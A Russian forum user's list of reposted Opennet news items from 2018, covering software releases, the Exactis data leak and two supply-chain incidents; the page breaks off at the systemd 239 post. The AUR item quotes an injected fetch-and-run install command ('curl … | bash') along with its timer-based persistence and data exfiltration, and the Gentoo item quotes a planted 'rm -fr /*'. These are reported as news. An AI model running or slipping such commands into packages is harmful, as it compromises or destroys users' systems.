- +

Просмотр сообщений

В этом разделе можно просмотреть все сообщения, сделанные этим пользователем.


Темы - denkin

Страницы: [1] 2 3 ... 11
1
Цитировать
В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (Adobe PDF Reader), balz 1.20-3 (утилита для сжатия файлов) и minergate 8.1-2 (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.

7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через периодический вызов по таймеру (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей.

Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Например, на первом этапе злоумышленниками мог проводиться анализ наиболее популярных системных окружений с целью подбора оптимального для большинства поражённых систем кода для майнинга криптовалют или требующего выкуп вредоносного шифровальщика.

Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. AUR позволяет любому желающему продолжать разработку orphane-пакетов, чем и воспользовался злоумышленник. Разработчики дистрибутива много раз предупреждали пользователей, что к пакетам из AUR (также справедливо для PPA и прочих репозиториев, в которых сторонние пользователи могут размещать свои пакеты) следует относиться с осторожностью и по возможности проверять содержимое файла PKGBUILD.

Проблема была выявлена в течение нескольких часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям, 7 июля устанавливавшим обновления вышеотмеченных пакетов, рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).
Новость на Opennet.

2
Новости / Обновление Firefox 61.0.1
« : Июль 06, 2018, 18:52:56 »
Цитировать
Подготовлен корректирующий выпуск Firefox 61.0.1, в котором устранено несколько ошибок. Решённые проблемы:

Устранена проблема, приводящая к отсутствию содержимого на странице , показываемой при открытии новой вкладки, а также в секции Home в настройках;
Исправлена ошибка, при редком стечении обстоятельств приводившая к потере закладок после обновления с выпуска Firefox 60;
Улучшено воспроизведение видеопотоков с Twitch при выборе уровня качества 1080p;
Решена проблема с потерей фокуса на текущей странице, в случае отображения браузером всплывающих окон;
Исправлена проблема с запуском загрузки файлов без расширений на платформе Windows;
Добавлена возможность загрузки файлов с FTP, при размещении ссылки на HTTP-страницах, при нажатии в контекстом меню "Save Link As" (в Firefox 61 была запрещена загрузка с FTP, кроме прямого указания ссылки в адресной строке);
Устранена ошибка, в определённых ситуациях не позволявшая дополнениям переопределять выбранную по умолчанию домашнюю страницу.
Новость на Opennet.

3
Цитировать
Представлен новый выпуск графического редактора GIMP 2.10.4, в котором продолжено оттачивание функциональности стабильной ветки 2.10. Также сообщается о возрождении пакета gimp-data-extras, который не обновлялся более 10 лет. В gimp-data-extras вынесены скрипты Alpha-to-Logo, которые не были включены в ветку 2.10 из-за ненадлежащего качества графики (для установки скриптов достаточно скопировать файлы ".scm" из архива в каталог scripts GIMP).
Новость на Opennet.
Spoiler: Подробности • показать

Кроме исправления ошибок в GIMP 2.10.4 представлено несколько новшеств:

Упрощено выполнение операции выравнивания горизонта - вместо ручного выравнивания, после выполнения инструментом Measure измерения угла смещения от горизонтали не покидая данный инструмент теперь можно выровнять горизонт одним кликом на новой кнопке в разделе свойств;

Реализована загрузка ресурсов в асинхронном режиме, которая позволяет избавиться от ожидания завершения загрузки всех доступных шрифтов во время запуска, благодаря продолжению загрузки данных в фоне без блокировки интерфейса;

Добавлена возможность привязки тегов к шрифтам, позволяющих быстро обратиться к нужному шрифту без перебора списка. Интерфейс работы с тегами идентичен уже применяемому для кистей, текстур и градиентов. В будущем рассматривается возможность автоматического назначения тегов на основе имеющихся в шрифте метаданных;
Расширены возможности отладочной панели Dashboard, содержащей индикаторы для наблюдения за потреблением ресурсов. Добавлена новая группа виджетов для отображения потребляемой памяти, общей физической памяти, доступной для использования памяти и размера кэша отрисовки (tile cache) в GIMP. В группе виджетов для контроля за буфером подкачки (tile swap) появилась раздельная информация о прочитанных и записанных данных;

Улучшена поддержка файлов в формате PSD - добавлена возможность загрузки включённой в файл предварительно обработанной (pre-composited) версий изображения, сохраняемой при выборе опции "Maximize Compatibility" в Photoshop. Для открытия подобных изображений в GIMP добавлен отдельный тип файлов "Photoshop image (merged)" (например, можно вначале попробовать открыть PSD как есть, а если возникли проблемы с отрисовкой попробовать новую опцию);
Налажен процесс создания сборок для macOS, который пока находится на уровне бета-версии из-за наличия некоторых неисправленных проблем;
В GEGL улучшена поддержка операции рекурсивной трансформации (Recursive Transform), позволяющий одновременно применить несколько трансформаций;

В GEGL также добавлена операция выборочной корректировки насыщенности и оттенка (Selective Hue-Saturation), позволяющая сначала выбрать оттенок, затем определить диапазон его изменения относительно базового значения и выполнить корректировку насыщенности для всех подпавших под маску пикселей. Также внесена порция исправлений в реализацию операции пикселизации (Pixelize), добавлен флаг выставления прозрачности (needs-alpha) в операции "Color to Alpha" и "svg-luminancetoalpha", добавлена настройка для определения допустимого порога в фильтре Sharpen (бывший Unsharp Mask);

В babl модернизирован код работы с палитрами и обеспечена возможность инициализации палитры в многопоточных приложениях (thread-safe). Добавлена серия цветовых пространств R~G~B~ и включены определения цветовых пространств ACEScg и ACES2065-1. Проведена чистка кода.
(ц)


4
Цитировать
Компания Oracle сформировала корректирующий релиз системы виртуализации VirtualBox 5.2.14, в котором отмечено 10 исправлений. В новой версии:

    В дополнениях для гостевых систем с Linux обеспечена возможность сборки драйвера vboxvideo с ядром Linux 4.17, а также со старыми выпусками ядра до версии 3.14 и пакетами с ядром до RHEL 7.1;
    Устранена ошибка, приводившая к краху при попытке доступа к пользовательскому интерфейсу через VNC;
    В интерфейсе пользователя обеспечена корректная обработка повторяющихся нажатий клавиш на хост-системах с X11;
    В виртуальной машине устранены проблемы с эмуляцией недокументированной инструкции SALC и эмуляцией режима "huge unreal";
    В коде эмуляции клавиатур PS/2 устранена проблема с обработкой частичных последовательностей скэн-кодов;
    При работе с файлами CUE налажен корректный разбор ключевого слова REM;
    Устранена редко проявляющаяся проблема в коде эмуляции USB-устройств xHCI, приводившая к прекращению передачи данных;
    В звуковой подсистеме убрано забивание лога ядра отладочными записями AssertLogRel;
    Обеспечена возможность загрузки драйвера ядра в тестовых выпусках macOS Mojave.
Новость на Opennet.

5
Цитировать
Представлен выпуск свободной системы нелинейного видеомонтажа OpenShot 2.4.2. Код проекта поставляется под лицензией GPLv3: интерфейс написан на Python и PyQt5, ядро обработки видео (libopenshot) написано на C++ и использует возможности пакета FFmpeg, интерактивная шкала времени написана с использованием HTML5, JavaScript и AngularJS. Для пользователей Ubuntu пакеты с последним выпуском OpenShot доступны через специально подготовленный PPA-репозиторий, для остальных дистрибутивов сформирована самодостаточная сборка в формате AppImage. Имеются сборки для Windows и macOS.
Новость на Opennet.
Spoiler: Подробности • показать

"Редактор отличается удобным и интуитивно понятным пользовательским интерфейсом, позволяющим редактировать видео даже начинающим пользователям. Программа поддерживает несколько десятков визуальных эффектов, дает возможность работы с многотрековыми монтажными шкалами с возможностью перемещения мышью элементов между ними, позволяет масштабировать, кадрировать, осуществлять слияние блоков видео, обеспечивать плавное перетекание из одного ролика в другой, производить наложение полупрозрачных областей и т.п. Имеется возможность перекодирования видео с предварительным просмотром изменений на лету. Благодаря задействованию библиотек проекта FFmpeg OpenShot поддерживает огромное количество форматов видео, звука и изображений (включая полную поддержку SVG).

Основные новшества:

    Добавлено семь новых эффектов (Crop, Hue, Color Shift, Pixelate, Bars, Wave, Shift), которые могут прикрепляться к ключевым кадрам и комбинироваться друг с другом;
    Добавлен режим автоматического микширования звука, при включении которого для клипов предлагается три разные стратегии микширования в случае пересечения звуковых дорожек. Например, фоновая музыка может автоматически приглушаться при воспроизведении участков с голосом;
    Возможность автоматического поворота фотографий или видео, в случае наличия в метаданных информации о вертикальной или горизонтальное ориентации устройства во время съёмки;
    Улучшено воспроизведение звука и устранены ошибки, приводившие к появлению треска. Обеспечено более плавное микширование;
    Закрыты почти все ошибки, приводившие к крахам на платформе Windows;
    В диалоге экспорта в заголовке окна обеспечен вывод информации о прогнозируемом времени завершении операции и FPS;
    Добавлена поддержка новых кодеков, в том числе экспериментальных кодеков, поддерживаемых в FFmpeg и LibAV. По умолчанию во многих преднастройках теперь используется звуковой кодек AAC;
    Разработка переведена на GitLab и использование модели GitFlow. "
(ц)


6
Цитировать
28 июня приблизительно в 20:20 UTC неустановленные лица получили контроль над GitHub-инфраструктурой проекта Gentoo и изменили содержимое репозиториев и некоторых страниц. Разработчики и мейнтейнеры пока работают над определением масштаба внесённых изменений и над возвращением контроля на репозиториями. Действия злоумышленников, получивших доступ к GitHub-репозиториям Gentoo, носили явно вредоносный характер, например, один из добавленный после взлома коммитов помещал во все ебилды команду "rm -fr /*".

Весь код проекта, размещённый на GitHub, на данный момент может считаться скомпрометированным, но это не касается кода, размещённого на собственной инфраструктуре проекта Gentoo. GitHub использовался лишь для зеркалирования, а первичный репозиторий ebuild был размещён на собственных серверах, таким образом допускается использовать rsync или webrsync с gentoo.org. Также не пострадали репозитории gentoo-mirror, которые были привязаны к отдельной учётной записи на Github. Все коммиты были подписаны, поэтому при использовании git следует обращать на эти подписи внимание.

Утром (04:26 UTC) контроль за репозиториями Gentoo в GitHub был восстановлен и в настоящее время совместно с сотрудниками GitHub проводится разбор инцидента и восстановление данных. При этом использовать код Gentoo на GitHub всё ещё не рекомендуется.
Новость на Opennet.

7
Цитировать
Зафиксирована крупнейшая утечка персональных данных - в открытый доступ попала база данных маркетинговой компании Exactis, включающая сведения практически обо всех взрослых жителях США. Причиной утечки стала ненадлежащая настройка серверного ПО - все данные хранились в СУБД ElasticSearch, доступ к которой не был ограничен для внешних сетевых запросов (применялась конфигурация по умолчанию) и любой желающий мог загрузить базу данных Exactis. Утечка была обнаружена одним из исследователей безопасности в процессе сканирования сети при помощи сервиса Shodan.

БД включала около 340 млн записей и имела размер почти 2 Тб. 230 млн записей содержали сведения о физических лицах и 110 млн данные, связанные с ведением бизнеса. Приведённая БД информация включает email, номера телефонов, почтовые адреса и более чем 400 персональных характеристик, например, курит ли человек, владеет ли собакой или кошкой, число детей, возраст, отношение к религии и личные интересы. Проведение контрольной проверки подтвердило подлинность данных, при наличии в некоторых случаях неточностей или устаревших сведений. Несмотря на то, что в базе не отражена финансовая информация, имеющиеся данные могут стать неплохим подспорьем для различных мошенников и скамеров. Источники, которые использовались компанией Exactis для сбора столь обширной коллекции персональных данных, неизвестны.
Новость на Opennet.

8
Цитировать
Представлен релиз растрового графического редактора Krita 4.1, развиваемого для художников и иллюстраторов. Редактор поддерживает многослойную обработку изображений, предоставляет средства для работы с различными цветовыми моделями и обладает большим набором средств для цифровой живописи, создания скетчей и формирования текстур. Для установки подготовлены самодостаточные образы в форматах AppImage и Flatpak для Linux, PPA для Ubuntu, а также бинарные сборки для macOS и Windows.
Новость н Opennet.

Spoiler: Основные улучшения • показать

"Основные улучшения:

Добавлен новый инструмент для срисовки с одного или нескольких эталонных изображений (Reference tool). Новый инструмент заменил собой старую панель с эталонными изображениями и отличается возможностью произвольного прикрепления эталонных изображений в любом месте холста без использования отдельных окон и панелей. Эталонные изображения можно масштабировать, поворачивать, изменять прозрачность и яркость. Ссылки или непосредственно сами эталонные изображения можно встроить в KRA-файл;


В средствах для создания анимации появились дополнительные операции управления кадрами - перемещение, добавление и копирование кадров, а также установка времени воспроизведения;

В реализации шкалы времени с раскадровкой анимации улучшено отображение сведений о продолжительности вывода кадров и пустых кадрах;

Добавлена новая опция для задания размера кэша анимации, при использовании которого результаты промежуточного рендеринга сохраняются на диске, а не держатся в оперативной памяти (полезно для обработки больших анимационных роликов). Также добавлен режим оптимизации "region of interest", при включении которого Krita производит пересчёт не всего холста, а только тех областей, которые изменяются в процессе просмотра на экране;

Добавлена новая опция смешивания цветов, упрощающая формирование искомого цвета, благодаря воспроизведению реалистичного процесса смешивания красок;


Улучшена реализация ассистента эфемерных опорных точек, задающего карту заливки. В каждом ассистенте отрисовки теперь можно управлять цветом по отдельности (ранее во всех ассистентах использовался один общий цвет);

Возвращена возможность сборки скриптового движка Krita с Python 2, который пока остаётся востребован некоторыми дополнениями VFX;
Обновлён пакет Comic Project Management, в котором переписаны просмотрщики страниц и комиксов, переработан код извлечения данных для перевода комиксов, значительно улучшена генерация ACBF;
Реализована поддержка RAW-форматов bay, bmq, cr2, cs1, dc2, dcr, dng, erf, fff, hdr, mdc, mos, mrw, nef, orf, pxn, raf, raw, rdc, sr2, srf, x3f, 3fr, cine, ia, kc2, mef, nrw, qtk, sti, rwl и srw;
Ускорены операции работы с кистями: кисти Circular Gaussian и Soft Brush теперь функционируют почти в 10 раз быстрее;
Добавлена возможность сохранять и загружать сеансы, определяющие набор изображений и окон с которыми производится работа. Сеансы позволяют воссоздать одно из ранее сохранённых рабочих окружений, вплоть до размера и местоположения окно на экране. Рабочие области теперь также могут охватывать окна на нескольких мониторах. Доступно два режима для многомонитрных конфигураций: показ активного изображения во всех окнах (одна часть изображения будет в окне на одном мониторе, о другая честь в окне на другом мониторе) и определение первичного рабочего окружения (изображение выводится только в текущем активном окне);
Добавлен фильтр, позволяющий корректировать цвет между разными цветовыми каналами, что например, можно использовать для увеличения интенсивности цвета только для светлых пикселей или обесцветить всё кроме одного оттенка;

Добавлен режим тестирования планшетов (settings->configure Krita->tablet->tablet tester), позволяющий выявлять проблемы с драйверами и распознаванием планшета;

В инструменты трансформации и кадрирования добавлено контекстное меню со списком доступных опций;
Добавлены новые настройки курсора;
Реализована возможность загрузки и записи данных в формате HEIF;
Плагин g’mic обновлён до версии 2.3.0."
(ц)


9
Новости / Выпуск web-браузера Opera 54
« : Июнь 29, 2018, 06:26:36 »
Цитировать
Состоялся выпуск проприетарного браузера Opera 54, основанного на кодовой базе Chromium. Сборки сформированы для платформ Linux, macOS и Windows. В новом выпуске представлена новая реализация стартовой страницы Speed Dial, в которой представлена выборка новостей, соответствующих выбранным тематическим фильтрам, языку и регионам. При желании кроме предопределённых новостных ресурсов можно добавить и собственные новостные ленты. Также оставлена возможность отключить показ новостей и как раньше отображать закреплённые ссылки на избранные страницы.
Кроме того, в новой версии добавлено новое меню "Update and Recovery", в которое вынесены опции, связанные с установкой и проверкой обновлений, а также со сбросом настроек. Браузерный движок обновлён до Chromium 67 с включением представленных в нём изменений для web-разработчиков.
Новость на Opennet.

10
Новости / Релиз Firefox 61
« : Июнь 27, 2018, 20:17:04 »
Цитировать
Состоялся релиз web-браузера Firefox 61, а также мобильной версии Firefox 61 для платформы Android. Кроме того, сформировано обновление веток с длительным сроком поддержки 52.9.0 и 60.1.0. В ближайшее время на стадию бета-тестирования перейдёт ветка Firefox 62, релиз которой намечен на 5 сентября.
Новость на Opennet.

Spoiler: Основные новшества • показать

"Основные новшества:

На платформах Windows и Linux включён механизм ускорения перехода между открытыми вкладками, работающий через упреждающую отрисовку содержимого, не дожидаясь явного клика на вкладке. При подведении курсора к вкладке браузер осуществит отрисовку в буфер композитинга и в случае клика мгновенно выведет уже готовое содержимое на экран, устраняя задержку на отрисовку видимых областей;
В движке Quantum CSS реализована техника оптимизации "Retained Display Lists" для ускорения отрисовки страниц. Метод базируется на изменении обработки списка отображаемых на экране высокоуровневых элементов страницы (окантовка, фоновая заливка, текст и т.п.), отсортированных в соответствии с правилами CSS для определения перекрытия элементов и видимости частей страницы на экране. Ранее при каждом обновлении экрана список полностью перестраивался, что с одной стороны значительно упрощало реализацию, но с другой стороны с ростом разрешений экрана и сложности сайтов возрастали накладные расходы, при том, что по статистике в 40% случаях перерисовывались почти идентичные кадры.
В новой версии обеспечено сохранение списка между перерисовками с генерацией нового сокращённого списка, охватывающего только изменённые части страницы. После формирования сокращённого списка выполняется операция его слияния со старым полным списком. Во многих случаях новый список изменённых элементов существенно меньше исходного полного списка, что позволяет добиться заметного повышения производительности, несмотря на общее усложнение алгоритма. Тестирование показало, что после внесения оптимизации время на полный цикл отрисовки в среднем сократилось на 33%, а частота вызова операций отрисовки уменьшилась на 40%;

В Quantum CSS также обеспечено распараллеливание операций парсинга CSS-файлов, помимо ранее реализованного режима параллельной обработки разобранных CSS-стилей;
API WebExtension расширен средствами для скрытия вкладок, которые позволяют реализовать расширения для сворачивания и группировки вкладок (см. пример на скринкасте). Для тех, кому не хватает удалённой функциональности Tab Groups предложено дополнение Panorama View;
Добавлена экспериментальная поддержка нового web-сервиса Firefox Monitor и связанного с ним встроенного дополнения , позволяющего проверить наличие email в базе скомпрометированных учётных записей, а также подписаться на вывод уведомления в случае появления сведений о компрометации в будущем. Проверка осуществляется через интеграцию с базой данных проекта haveibeenpwned.com, включающей сведения о более чем 5 миллиардах учётных записей, похищенных в результате взломов 289 сайтов. Метод проверки является анонимным и основан на передаче префикса SHA-1 хэша от email (несколько первых символов), в ответ на который сервер выдаёт соответствующие запросу хвосты хэшей из своей базы, а браузер на своей стороне сверяет их с имеющимся полным хэшем и в случае совпадения выдаёт предупреждение (полный хэш не передаётся). Дополнение будет предложено для тестирования ограниченному числу пользователей Firefox (предположительно в тестировании примут участие 250 тысячей пользователей, преимущественно в США);

Появилась возможность добавления поисковых систем через контекстное меню адресной строки. Если сайт предоставляет плагин OpenSearch, в меню теперь выводится соответствующее приглашение добавить новую поисковую систему;

Улучшена поддержка тёмной темы оформления, обеспечено её сочетание со всеми элементами интерфейса Firefox;

Упрощён обмен ссылками в версии Firefox для macOS - в меню адресной строки появилась возможность отправки URL страницы в активной вкладке;
Улучшена система синхронизации закладок;
Добавлена новая отдельная секция настроек (about:preferences#home) для управления содержимым домашней страницы и страницы новой вкладки. Настройки также доступны через пиктограмму в виде шестерёнки на странице новой вкладки;

Включено несколько оптимизаций для увеличения скорости запуска: добавлена настройка browser.startup.blankWindow для отображения пустого окна как можно раньше с последующим заполнением, API для работы со списками блокировки переведён на асинхронный режим работы, в ContentPrefs задействован Sqlite.jsm. При запуске Firefox теперь оценивает время запуска и в случае слишком медленного старта выдаёт подсказку со ссылкой на страницу с обзором типового решения проблем с производительностью (сброс настроек);
Встроена поддержка изменчивых шрифтов OpenType (variable fonts), в которых толщина, ширина и другие стилистические характеристики глифа могут произвольно меняться. Для управления начертанием изменчивых шрифтов добавлены новые CSS-свойства font-weight, font-stretch и font-style, а также унифицированное свойство @font-face;
Включена по умолчанию поддержка последнего чернового варианта спецификации TLS 1.3;
Запрещена загрузка ресурсов по протоколу FTP из страниц, открытых по HTTP/HTTPS. Прямое открытие URL "ftp://" в адресной строке по-прежнему допустимо;
Добавлена поддержка Cookie-атрибута SameSite, который можно использовать для блокирования CSRF-атак. При помощи SameSite можно разрешить отправку Cookie только в ответ на запросы, инициированные с сайта, с которого эти Cookie изначально были получены. Запросы, отправленные с URL, который не совпадает адресом назначения, будут уходить без выставленных для целевого сайта Cookie. Атрибут SameSite может принимать два значения ‘strict’ или ‘lax’. В режиме 'strict' Cookie будут удерживаться от отправки любых видов межсайтовых запросов. В режиме 'lax' будут применяться более мягкие ограничения и передача Cookie будет блокироваться только для межсайтовых субзапросов, таких как запрос изображения или загрузка контента через iframe;
Кнопка "Forget", доступная в интерфейсе кастомизации, теперь приводит к очистке всех Service Workers и связанного с ними кэша;
Добавлены новые JavaScript-методы String.prototype.trimStart() и String.prototype.trimEnd() для удаления пробелов в начале или конце строки;
Добавлен API PerformanceServerTiming, предоставляющий доступ к метрикам производительности сервера, переданным через HTTP-заголовок "Server-Timing";
В CSS-свойстве "flex-basis" добавлена поддержка параметра "content" для включения автоматического выбора размера блока на основе фактического размера содержимого;
В CSS реализована поддержка псевдокласса ":host";
Добавлена поддержка расширенного синтаксиса CSS-свойства overflow с двумя значениями (например, "overflow: hidden visible;" эквивалентно "overflow-x: hidden; "overflow-y: visible;");
DOM-свойства anchors, applets, embeds, forms, head, images, links, plugins и scripts перенесены из интерфейса HTMLDocument в Document;
Добавлено новое DOM-свойство Request.destination, возвращающее тип запрошенного контента (например, "document", "manifest", "image", "worker", "audioworklet" и т.п.);
В инструменты для web-разработчиков добавлена система инспектирования применения на странице средств для людей с ограниченными возможностями (Accessibility inspector).

Включено по умолчанию новое оформление web-консоли - Browser Console и Browser Toolbox. Старый интерфейс консоли удалён;
Изменено оформление основной панели инструментов для web-разработчиков, которое адаптировано для комфортной работы на слишком узких или широких экранах. Вкладки любых панелей инструментов теперь могут перемещаться мышью и группироваться по желанию пользователя, который может собрать в одном месте коллекцию из наиболее часто используемых инструментов;
В режиме инспектирования для просмотра переменных CSS теперь достаточно подвести курсор и параметры будут отображены на всплывающей подсказке. Так же добавлена поддержка автодополнения переменных CSS c наглядным отображением значений цветов;

В инструментах для web-разработчиков в режиме инспектировния сети появилось новое меню для урезания пропускной способности с целью симуляции открытия страниц через низкоскоростные каналы связи. Ранее данная возможность была доступна только в Responsive Design Mode. В интерфейс инспектирования сети также добавлены кнопки для быстрого сохранения и импорта HTTP-запросов в формате HAR (HTTP Archive). На панель добавлена новая вкладка Cache с информацией об уже ранее прокэшированных ресурсах;

В версии для платформы Android проведена оптимизация прокрутки экрана и устранена проблема, приводившая к краху на устройстве Samsung Galaxy S8 при использовании платформы Android 8.0 (Oreo);
Кроме новшеств и исправления ошибок в Firefox 61 устранено 52 уязвимости, из которых 39 помечены как критические (3 одиночных, 9 под CVE-2018-5186, 10 под CVE-2018-5187 и 17 под CVE-2018-5188), т.е. потенциально могут привести к выполнению кода злоумышленника при открытии специально оформленных страниц."
(ц)


11
Цитировать
Представлена новая стабильная версия свободной настольной геоинформационной системы QGIS 3.2 "Bonn". Программа написана на языке С++ с использованием библиотеки Qt и распространяется под лицензией GPL. Готовые сборки подготовлены для различных дистрибутивов Linux, Windows, macOS, BSD-систем и Android. Пакет имеет гибкую систему дополнений, существенно расширяющих его функциональность, которые могут создаваться на языках С++ или Python.
Новость на Opennet.

"Основным предназначением QGIS является обработка и анализ пространственных данных, подготовка различной картографической продукции. Помимо решения сугубо профессиональных задач, программа может быть успешно использована при решении широкого круга повседневных задач, связанных с анализом пространственной информации. Из бытовых применений в первую очередь можно выделить решение задач планирования путешествий: оценки транспортной доступности района и расчёта оптимальных маршрутов передвижения по пересечённой местности.
Программой оддерживаются все наиболее распространённые векторные и растровые форматы, включая ESRI Shapefile, DXF, GeoTIFF. Для растровых данных, не имеющих пространственной привязки, например, сканов старинных карт или аэроснимков, может быть выполнена пространственная привязка. В новой версии заявлена поддержка структурированных и неструктурированных сеточных данных. Традиционно доступна возможность доступа к данным через PostGIS-соединения (надстройка над PostgreSQL для хранения в базе пространственных данных), а также по сетевым протоколам WMS/WMTS, WCS, WFS. Существует возможность вызова функций других программ (GRASS GIS, SAGA GIS, Orfeo toolbox и др.) и построения систем внутренней автоматизации выполнения операций.

Основные новшества:

Переработан интерфейс построения вычисляемых выражений (expression builder);
В инструмент для работы с картами добавлена функция интерактивного сглаживания и возможность подгонки масштаба под выделенную область;
Обеспечена возможность обращения к векторным или растровым данным на внешних серверах (HTTP, HTTPS, FTP) или в облачных сервисах;
В инструмент идентификации и выделения объектов добавлены новые опции;
Добавлена возможность сохранения метаданных в проектах QGIS;
В пользовательский интерфейс добавлены индикаторы применения фильтров к слоям;
В DB Manager обеспечено сохранение истории выполнения SQL-запросов и добавлена возможность выполнения SQL-запросов в фоновом режиме;
Расширены возможности форм и виджетов. Реализована поддержка каскадных форм ввода данных;
Представлен новый формат "qgz" для сохранения файлов проекта в сжатом виде;
Добавлена возможность сохранения проектов в СУБД PostgreSQL;
В дополнение к растровым и векторным слоям добавлена начальная поддержка mesh-слоёв;
Добавлена функция для просмотра карты в полноэкранном режиме (Ctrl-Shift-Tab);
Появилась возможность переноса групп и слоёв между проектами при помощи буфера обмена (copy/paste);
Добавлены индикаторы встроенных слоёв и групп, в заголовок добавлен индикатор наличия несохранённых изменений;
Добавлены новые алгоритмы обработки моделей: фильтрации, зональной гистограммы, проектных точек, вращения и сегментирования. Алгоритмы объединения, оценки различий и пересечения переписаны с Python на С++;
В режиме 3D-просмотра добавлена возможность отображения обратных граней для более качественной визуализации;
Оптимизирован выбор цвета меток новых слоёв;
В строке поиска обеспечена поддержка поиска закладок и настроек, а также появилась возможность вычисления простых математических выражений (напирмер "= 10/3")."
(ц)




12
Цитировать
Несмотря на активную подготовку новой ветки графического тулкита GTK+ 4, разработчики решили отойти от изначально намеченного плана и выпустить ещё один значительный релиз в ветке GTK+ 3 - 3.24, бэкпортировав в него некоторые новшества.

Напомним, что выпуск GTK+ 3.22 намечался как финальный, фиксирующий изменения в ветке 3.x и поддерживаемый три года без изменения API. Ветка GTK+ 4 развивается в рамках нового процесса разработки, который пытается предоставить разработчикам приложений стабильный и поддерживаемый в течение нескольких лет API, который можно использовать не опасаясь, что каждые полгода придётся переделывать приложение из-за изменения API в очередной ветке GTK+. Процесс стабилизации GTK+ 4 затянулся и с момента выпуска GTK+ 3.22 прошло уже два года, поэтому стало целесообразно подготовить ещё один значительный релиз ветки GTK+ 3.x.
Новость на Opennet.

"GTK+ 3.24 планируется опубликовать в сентябре и включить в него такие возможности, как поддержку изменчивых шрифтов и Emoji, а также расширить API новыми вызовами, следуя пожеланиям разработчиков портируемых приложений. После релиза сопровождение переключится на ветку GTK+ 3.24.x, а корректирующие выпуски GTK+ 3.22.x больше выпускаться не будут. Мотивом для формирования GTK+ 3.24 также является желание добиться паритета в номерах выпуска с веткой GTK+ 2.x: GTK+ 3.24 станет последним выпуском ветки GTK+ 3, что символично, так как GTK+ 2.24 был последним выпуском ветки GTK+ 2. В настоящее время для ознакомления уже подготовлен экспериментальный выпуск GTK+ 3.23.0.

Наиболее заметные новшества GTK+ 3.23.0:

Добавлены новые возможности настройки шрифтов, позволяющие настраивать возможности шрифтов OpenType, отображать примеры применения режимов OpenType, манипулировать параметрами изменчивых шрифтов и изменять уровни детализации;
Добавлен всплывающий виджет для выбора Emoji и режим ввода Emoji с клавиатуры (Ctrl-Shift-e);
В число публично доступных API переведён вызов gdk_window_move_to_rect;
Бэкенд для Wayland переведён на использование анонимной разделяемой памяти на платформе FreeBSD."
(ц)


13
Цитировать
Уилл Кук (Will Cooke), менеджер по разработке десктоп-систем в компании Canonical, опубликовал отчёт с суммарной статистикой о конфигурации систем пользователей Ubuntu 18.04, согласившихся на участие в программе отправки телеметрии на серверы Canonical. Напомним, что в Ubuntu 18.04 по умолчанию был включён режим отправки телеметрии с обезличенными параметрами системы, но в настройках и на заставке, выводимой при первом запуске дистрибутива, явно предоставлялась возможность отключить сбор телеметрии.
Новость на Opennet.

"В итоге, только 33% пользователей отключили телеметрию, а 67% отправили метрики с параметрами конфигурации. В обезличенном виде были отправлены такие сведения, как версия и редакция Ubuntu, наличие сетевого соединения, семейство CPU, размер ОЗУ и дисков, разрешение экрана, модель GPU, производитель оборудования, местоположение (выбранное пользователем при установке), время, затраченное на установку, выбор автоматического или парольного входа, выбранный вариант разметки диска, выбранные в процессе установки сторонние приложения, включение LivePatch, сведения о загрузке, установке, обновлении и удалении пакетов.

Информация собирается с целью анализа реальных аппаратных конфигураций и предпочтений пользователей для оптимизации состава дистрибутива для типовых окружений, выработки оптимальных настроек по умолчанию и концентрации внимания на возможностях, востребованных большинством пользователей. Данные собираются анонимно в виде общей статистики без привязки к конкретным пользователям. Статистика отправляется при помощи приложения ubuntu-report, доступного для аудита и поставляемого в исходных текстах.

Некоторая статистика на основе полученных данных:

В среднем время установки дистрибутива Ubuntu Desktop занимает 18 минут. Разброс во времени установки составляет от 8 до 28 минут. Разработчики намерены провести работу по сокращению времени установки;

Примерно четверть зафиксированных за последние два месяца установок выполнены для обновления ранее существующих систем при помощи полной переустановки не дожидаясь уведомления о переходе на следующий выпуск через менеджер установки обновлений (возможность обновления Ubuntu 16.04 LTS до 18.04 будет предложена начиная с 26 июля после выхода корректирующего релиза Ubuntu 18.04.1);
В процессе инсталляции более 90% пользователей выбрали опцию для загрузки обновлений пакетов в процессе установки, 53% выбрали дополнительную установку проприетарных дополнений (кодеки, драйверы и т.п.), 28% выбрали режим автоматического входа на рабочий стол без аутентификации. Минимальным режимом установки воспользовались всего 15% пользователей;
На большинстве систем пользователей Ubuntu Desktop установлен один CPU;

54% пользователей при установке выбирают очистку таблицы разделов и переразбивку диска. 22% вручную меняют таблицу разделов;

Наиболее популярным разрешением экрана является 1920x1080 (Full HD), затем следует 1366x768 и на третьем месте 800x600 (видимо связано с запуском в виртуальных машинах). HiDPI и 4k экраны пока используются достаточно редко.

Наиболее часто применяются экраны с плотностью пикселей менее 120 DPI, с большим отставанием на втором месте экраны до 160 DPI;

Достаточно редким явлением оказались системы с несколькими видеокартами и более чем одним монитором;

Чаще всего системы пользователей оснащены 4, 8 и 2 Гб ОЗУ, но системы с 1 Гб ОЗУ также оказались не редкостью. Небольшим сюрпризом стало наличие систем со 128 Гб ОЗУ;

Наибольшее число установок было произведено в США, Китае, Индии, Бразилии, Германии, Франции и России."
(ц)


14
Цитировать
Леннарт Поттеринг представил релиз системного менеджера systemd 239. Из новшеств можно отметить концепцию переносимых сервисов, изменение наименования виртуальных сетевых интерфейсов, усиление защиты системных сервисов, поддержку DNS-over-TLS, режим suspend-then-hibernate, возможность сохранения дампа памяти при спящем режиме в файлы подкачки.
Новость на Opennet.
Spoiler: Подробности • показать

"Основные изменения:

